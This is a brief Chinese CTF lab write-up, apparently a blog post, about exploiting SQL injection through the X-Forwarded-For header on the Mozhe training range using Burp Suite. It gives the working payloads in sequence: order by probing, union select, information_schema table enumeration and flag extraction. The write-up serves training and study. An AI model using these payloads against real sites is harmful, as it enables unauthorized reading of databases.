用bp抓墨者任性网站的包,发送给repeater模块,自己填入X-Forwarded-For,然后判断是否可注入。
输入and 1=1发现没有报错,证明存在注入点

用order by判断表的数量

输入到5就报错了,说明只有4个表
构建语句union select 1,2,3,4

发现名称,价格,数量都对应这些数字
通过union select 1,2,3,(select group_concat(table_name) from information_schema.tables where table_schema=database())

发现有个flag的表名,接下来
union select 1,2,3,(select group_concat(flag) from flag)

获得flag,然后获得key
HTTP头注入漏洞测试(X-Forwarded-for)
SQL注入实战教程
最新推荐文章于 2023-12-29 17:22:41 发布
本文详细介绍了一种使用Burp Suite进行SQL注入攻击的方法。通过抓取网站数据包并发送至repeater模块,自行设置X-Forwarded-For字段,判断是否存在注入点。利用and1=1测试,确认存在漏洞后,通过orderby语句确定数据库表数量,进一步利用union select语句获取敏感信息,最终成功读取flag表中的关键数据。
8264

被折叠的 条评论
为什么被折叠?



